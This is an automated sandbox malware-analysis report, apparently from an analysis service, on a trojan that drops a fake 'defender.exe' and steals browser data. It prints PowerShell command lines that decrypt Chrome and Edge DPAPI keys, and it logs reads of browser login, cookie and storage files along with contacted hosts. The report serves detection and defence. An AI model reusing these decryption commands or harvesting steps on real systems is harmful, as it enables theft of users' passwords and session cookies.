Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'currentuser')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'currentuser')Jump to behavior
Source: explorer.exe, 0000001D.00000000.1772539756.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.1773930118.0000000004880000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1776329895.0000000009013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001D.00000000.1772539756.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: ..\..\electron\shell\browser\ui\views\electron_views_delegate_win.ccGetAppbarAutohideEdgesShell_TrayWnd
Source: explorer.exe, 0000001D.00000000.1772539756.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
Source: explorer.exe, 0000001D.00000000.1771958390.0000000000C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
Source: explorer.exe, 0000001D.00000000.1772539756.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\672e2c2b3206cc57c836d5e96ea2e71e VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\672e2c2b3206cc57c836d5e96ea2e71e\Cookies VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\672e2c2b3206cc57c836d5e96ea2e71e\Cookies VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\672e2c2b3206cc57c836d5e96ea2e71e.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\resources VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\resources\app.asar VolumeInformation

Stealing of Sensitive Information

barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local Storage\leveldbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.dbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.dbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile read: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\672e2c2b3206cc57c836d5e96ea2e71e\Cookies\Google_Default.txtJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		12
Process Injection		111
Masquerading		1
OS Credential Dumping		1
Query Registry		Remote Services11
Data from Local System		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter		Boot or Logon Initialization Scripts1
DLL Side-Loading		21
Virtualization/Sandbox Evasion		1
Credentials In Files		1
Security Software Discovery		Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
Process Injection		Security Account Manager3
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS21
Virtualization/Sandbox Evasion		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
Remote System Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync2
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem23
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1487580 Sample: SecuriteInfo.com.HEUR.Troja... Startdate: 04/08/2024 Architecture: WINDOWS Score: 60 57 www.setekshome.com 2->57 59 ws-eu.pusher.com 2->59 61 6 other IPs or domains 2->61 73 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->73 75 AI detected suspicious sample 2->75 9 SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe 179 2->9         started        signatures3 process4 file5 43 C:\Users\user\AppData\Local\...\defender.exe, PE32+ 9->43 dropped 45 C:\Users\user\AppData\Local\...\nsis7z.dll, PE32 9->45 dropped 47 C:\Users\user\AppData\Local\...\System.dll, PE32 9->47 dropped 49 12 other files (none is malicious) 9->49 dropped 77 Drops large PE files 9->77 13 defender.exe 58 9->13         started        signatures6 process7 dnsIp8 67 setekshome.com 185.111.234.27, 443, 49712, 49713 TR-FBSTR Turkey 13->67 69 clientstats1-dummy-server-lb-398743415.us-east-1.elb.amazonaws.com 3.222.214.216, 443, 49732 AMAZON-AESUS United States 13->69 71 3 other IPs or domains 13->71 51 C:\Users\user\AppData\Local\...\webdata.db, SQLite 13->51 dropped 53 C:\Users\user\AppData\Local\...\passwords.db, SQLite 13->53 dropped 55 31dd1108-f1cf-4a57...8839a99b19.tmp.node, PE32+ 13->55 dropped 79 Tries to harvest and steal browser information (history, passwords, etc) 13->79 18 defender.exe 7 13->18         started        21 cmd.exe 1 13->21         started        23 cmd.exe 1 13->23         started        25 5 other processes 13->25 file9 signatures10 process11 dnsIp12 63 chrome.cloudflare-dns.com 162.159.61.3, 443, 49722 CLOUDFLARENETUS United States 18->63 65 172.64.41.3, 443, 49723 CLOUDFLARENETUS United States 18->65 27 powershell.exe 15 21->27         started        29 conhost.exe 21->29         started        31 powershell.exe 15 23->31         started        33 conhost.exe 23->33         started        35 tasklist.exe 1 25->35         started        37 tasklist.exe 1 25->37         started        39 conhost.exe 25->39         started        41 conhost.exe 25->41         started        process13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\d3dcompiler_47.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\ffmpeg.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\libEGL.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\libGLESv2.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\31dd1108-f1cf-4a57-b5c5-108839a99b19.tmp.node0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\d3dcompiler_47.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\defender.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\ffmpeg.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\libEGL.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\libGLESv2.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\resources\elevate.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\vk_swiftshader.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\vulkan-1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\System.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\nsis7z.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
chrome.cloudflare-dns.com0%VirustotalBrowse
clientstats1-dummy-server-lb-398743415.us-east-1.elb.amazonaws.com0%VirustotalBrowse
ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com0%VirustotalBrowse
socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com0%VirustotalBrowse
setekshome.com0%VirustotalBrowse
sockjs-eu.pusher.com0%VirustotalBrowse
stats.pusher.com0%VirustotalBrowse
ws-eu.pusher.com0%VirustotalBrowse
www.setekshome.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
https://support.google.com/chrome/answer/60988690%URL Reputationsafe
https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
https://excel.office.com0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
https://word.office.com0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
https://outlook.com0%URL Reputationsafe
https://android.notify.windows.com/iOS0%URL Reputationsafe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp0%URL Reputationsafe
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the0%URL Reputationsafe
https://api.msn.com/v1/news/Feed/Windows?0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
http://schemas.micro0%URL Reputationsafe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
https://dns10.quad9.net/dns-query0%Avira URL Cloudsafe
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world0%Avira URL Cloudsafe
https://www.google.com/chrome/privacy/eula_text.html0%Avira URL Cloudsafe
https://doh.familyshield.opendns.com/dns-query0%Avira URL Cloudsafe
https://api.msn.com:443/v1/news/Feed/Windows?t0%Avira URL Cloudsafe
https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter0%Avira URL Cloudsafe
https://doh.cleanbrowsing.org/doh/security-filter0%Avira URL Cloudsafe
https://dns10.quad9.net/dns-query1%VirustotalBrowse
https://doh.familyshield.opendns.com/dns-query0%VirustotalBrowse
https://public.dns.iij.jp/0%Avira URL Cloudsafe
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-0%Avira URL Cloudsafe
https://public.dns.iij.jp/0%VirustotalBrowse
https://photos.google.com/settings?referrer=CHROME_NTP0%Avira URL Cloudsafe
https://www.google.com/chrome/privacy/eula_text.html1%VirustotalBrowse
https://doh.cox.net/dns-query0%Avira URL Cloudsafe
https://dns11.quad9.net/dns-querydns11.quad9.net9.9.9.11149.112.112.112620:fe::112620:fe::fe:11Pd0%Avira URL Cloudsafe
https://doh.cleanbrowsing.org/doh/security-filter0%VirustotalBrowse
https://photos.google.com/settings?referrer=CHROME_NTP0%VirustotalBrowse
https://www.nic.cz/odvr/0%Avira URL Cloudsafe
https://dns11.quad9.net/dns-query0%Avira URL Cloudsafe
https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/0%Avira URL Cloudsafe
https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl0%Avira URL Cloudsafe
https://www.nic.cz/odvr/CZ.NIC0%Avira URL Cloudsafe
https://www.nic.cz/odvr/0%VirustotalBrowse
https://dns11.quad9.net/dns-query1%VirustotalBrowse
https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc0%Avira URL Cloudsafe
https://doh.cox.net/dns-query0%VirustotalBrowse
https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/0%VirustotalBrowse
https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl0%VirustotalBrowse
https://wns.windows.com/0%Avira URL Cloudsafe
https://www.google.com/chrome/privacy/eula_text.htmlG0%Avira URL Cloudsafe
https://public.dns.iij.jp/IIJ0%Avira URL Cloudsafe
